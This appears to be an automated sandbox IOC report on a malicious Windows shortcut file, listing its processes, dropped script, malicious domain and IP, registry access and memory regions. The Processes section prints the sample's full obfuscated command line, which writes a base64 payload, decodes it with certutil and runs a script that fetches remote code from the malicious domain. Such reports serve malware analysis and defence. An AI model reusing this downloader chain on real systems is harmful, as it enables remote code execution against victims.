IOC Report
Pyo37mDzQ2.lnk

loading gif

Files

File Path
Type
Category
Malicious
Pyo37mDzQ2.lnk
MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\9cEA9JA\9cEA9JA.jS
ASCII text, with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil -f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
malicious
C:\Windows\System32\certutil.exe
cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS

URLs

Name
IP
Malicious
http://niua9f.tabcoperoo.sbs/?1/
104.21.40.83
malicious
hTtP://niua9f.tabcoperoo.sbs/?1/
unknown
http://niua9f.tabcoperoo.sbs/
unknown
https://www.cloudflare.com/cdn-cgi/errorP%
unknown
https://www.cloudflare.com/
unknown
https://www.cloudflare.com/cdn-cgi/error
104.16.123.96
https://www.cloudflare.com/cdn-cgi/errore.com/U
unknown
https://www.cloudflare.com/M
unknown

Domains

Name
IP
Malicious
niua9f.tabcoperoo.sbs
104.21.40.83
malicious
www.cloudflare.com
104.16.123.96

IPs

IP
Domain
Country
Malicious
104.21.40.83
niua9f.tabcoperoo.sbs
United States
malicious
104.16.123.96
www.cloudflare.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
Name

Memdumps

Base Address
Regiontype
Protect
Malicious
21062570000
remote allocation
page read and write
6B74BFC000
stack
page read and write
6B74AFF000
stack
page read and write
6B74CFA000
stack
page read and write
210640A0000
trusted library allocation
page read and write
21062084000
heap
page read and write
2106258C000
heap
page read and write
6B747FE000
stack
page read and write
210607A1000
heap
page read and write
21062410000
heap
page read and write
210606D0000
heap
page read and write
2106078D000
heap
page read and write
210609AE000
heap
page read and write
25675B00000
heap
page read and write
21060745000
heap
page read and write
21060530000
heap
page read and write
210607CC000
heap
page read and write
2106259B000
heap
page read and write
25675B20000
heap
page read and write
21062080000
heap
page read and write
21060745000
heap
page read and write
21062570000
heap
page read and write
2106078D000
heap
page read and write
210606F9000
heap
page read and write
2106073B000
heap
page read and write
21060799000
heap
page read and write
2106078D000
heap
page read and write
21063F30000
heap
page read and write
210609A0000
heap
page read and write
DD2157C000
stack
page read and write
21060783000
heap
page read and write
21060670000
heap
page read and write
21060783000
heap
page read and write
6B74DFE000
stack
page read and write
2106259D000
heap
page read and write
2106073E000
heap
page read and write
210607CC000
heap
page read and write
2106078D000
heap
page read and write
21062570000
remote allocation
page read and write
25675F00000
heap
page read and write
21060705000
heap
page read and write
210606F9000
heap
page read and write
DD218FE000
stack
page read and write
2106077E000
heap
page read and write
21062415000
heap
page read and write
2106070C000
heap
page read and write
21060799000
heap
page read and write
21060799000
heap
page read and write
2106079C000
heap
page read and write
25675B68000
heap
page read and write
2106073E000
heap
page read and write
2106073B000
heap
page read and write
210607A1000
heap
page read and write
2106073B000
heap
page read and write
21060783000
heap
page read and write
DD215FD000
stack
page read and write
25675B60000
heap
page read and write
6B74EFE000
stack
page read and write
25675A90000
heap
page read and write
21060705000
heap
page read and write
21060728000
heap
page read and write
210607CE000
heap
page read and write
25677910000
heap
page read and write
210607A1000
heap
page read and write
6B74FFF000
stack
page read and write
DD2187E000
stack
page read and write
6B743F8000
stack
page read and write
210606D8000
heap
page read and write
6B749FF000
stack
page read and write
2106070A000
heap
page read and write
6B743F6000
stack
page read and write
21060745000
heap
page read and write
210609A5000
heap
page read and write
21062594000
heap
page read and write
2106258C000
heap
page read and write
2106259D000
heap
page read and write
21060761000
heap
page read and write
21062594000
heap
page read and write
2106077E000
heap
page read and write
21060783000
heap
page read and write
21060728000
heap
page read and write
2106073E000
heap
page read and write
2106077E000
heap
page read and write
256778D0000
heap
page read and write
210606F5000
heap
page read and write
210607CE000
heap
page read and write
2106259C000
heap
page read and write
21060728000
heap
page read and write
21060705000
heap
page read and write
210607CE000
heap
page read and write
210607CC000
heap
page read and write
21060690000
heap
page read and write
25675F05000
heap
page read and write
6B746FE000
stack
page read and write
2106077E000
heap
page read and write
2106079E000
heap
page read and write
21062570000
remote allocation
page read and write
210606F7000
heap
page read and write
There are 88 hidden memdumps, click here to show them.